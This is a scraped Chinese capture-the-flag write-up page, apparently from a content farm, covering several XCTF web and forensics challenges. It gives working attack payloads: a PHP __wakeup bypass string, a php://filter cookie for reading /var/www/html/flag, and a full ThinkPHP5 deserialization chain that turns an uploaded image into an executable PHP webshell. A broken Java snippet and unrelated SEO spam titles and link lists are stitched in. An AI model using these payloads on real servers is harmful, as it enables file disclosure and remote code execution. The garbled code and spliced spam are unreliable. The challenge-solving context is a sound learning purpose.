当前位置: 首页 > news >正文

佛山网站优化如何深圳十大活动策划公司

佛山网站优化如何,深圳十大活动策划公司,十大免费网站模板网站,怎么做网页1 unserialize3 当序列化字符串中属性个数大于实际属性个数时,不会执行反序列化 外部如果是unserialize()会调用wakeup()方法,输出“bad request”——构造url绕过wakeup 类型:public class&…

1

 unserialize3

当序列化字符串中属性个数大于实际属性个数时,不会执行反序列化

外部如果是unserialize()会调用wakeup()方法,输出“bad request”——构造url绕过wakeup

类型:public class,直接构造:
O:4:"xctf":1:{s:4:"flag";s:3:"111";} 改为:O:4:"xctf":2:{s:4:"flag";s:3:"111";}

2

“找出攻击者的IP”

http协议中,

可疑:POST了hacker.php,追踪hacker.php,url解码,确认是开了个后门

3

进入

就是base64解码

4

 只出现一次的数字

class Solution{public int singleNumber(int[t] nums){int result = 0;for (int num : nums)}{result =resut ^num;}return result;}
}

5

fileinclude

PHP: php:// - Manual

Cookie: language=php://filter/read=convert.base64-encode/resource=/var/www/html/flag

upload3

注册登录,对头像尝试文件上传,但无法执行

进行目录扫描获取源码,TP5框架

profile.php

cookie有个反序列化,审完代码以后可以i使用(覆盖掉filename)

if:前两个判断不用改就可以绕过,进ext_check()判断

然后赋值ext
接下来把 filename_tmp 移动到 filename时,就可以把 png 移动为 php 文件了。

_get()与_call():作用上传图像访问,被访问不存在时调用 upload_img()

register.php:
registed 赋值为 false,checker 赋值为我们的 $profile

从而调用其中的 index 方法,再跳到 upload_img() 了。

<?phpnamespace app\web\controller;
error_reporting(0);
class Profile
{public $checker;public $filename_tmp;public $filename;public $upload_menu;public $ext;public $img;public $except;public function __get($name){return $this->except[$name];}public function __call($name, $arguments){if($this->{$name}){$this->{$this->{$name}}($arguments);}}}class Register
{public $checker;public $registed;public function __destruct(){if(!$this->registed){$this->checker->index();}}}$profile = new Profile();
$profile->except = ['index' => 'img'];
$profile->img = "upload_img";
$profile->ext = "png";
$profile->filename_tmp = "./upload/e0080b11355313cb26095733241d9209/0412c29576c708cf0155e8de242169b1.png";
$profile->filename = "./upload/e0080b11355313cb26095733241d9209/0412c29576c708cf0155e8de242169b1.php";$register = new Register();
$register->registed = false;
$register->checker = $profile;echo urlencode(base64_encode(serialize($register)));

ThinkPHP5.1反序列化漏洞利用-CSDN博客

http://www.yayakq.cn/news/689662/

相关文章:

  • 做动画网站去哪采集怎样找需要做网站客户
  • 首次建设网站流程免费注册网站平台
  • 海口建设厅网站网络营销的方式有十种
  • 制作网站后台好123上网主页免费
  • 企业免费推广网站免费的推广平台有哪些
  • 做结婚请柬网站有那些网站优化 价格查询
  • 如何做收费影视资源网站做竞价网站 要注意什么
  • 内外网网站栏目建设方案建购物网站需要多少钱
  • 网站建设文案有趣网站建站流程图
  • 金融公司网站建设wordpress建站显示网站图标
  • 建设网站费用入会计分录一建延期最新消息2022
  • 网站免费模块烟台学校网站建设
  • 个人怎么做贷款网站苏州怎么做网站
  • 做特产的网站开张怎么宣传线上营销策划方案
  • 公司免费网站搭建河北网站备案 多长时间通过
  • 华蓥住房和城乡建设厅网站wordpress安装使用视频教程
  • 好看的网站模版友情链接工具
  • wordpress应用的主题修改教程无锡优化网站价格
  • 广东网站建设在电脑上做苗木网站
  • 住房和城乡建设部网站标准定额网站开发后端待遇
  • 学做面包的网站汽车服务站建站流程
  • 网站建设注意哪些建e网室内设计网 模型
  • 石家庄seo网站优化西安做网站好的公司
  • 网站弹窗是怎么做的生产模板的厂家
  • 微网站的优缺点wordpress的音乐插件
  • 查询海外whois的网站如何建立免费的网站
  • 企业建站什么网站好企业品牌推广渠道
  • 网站对网络营销的作用徐州网站建设托管
  • 花生壳怎么发布自己做的网站重庆专业的网站建设公司哪家好
  • 手机网站开发 视频教程泰安城建吧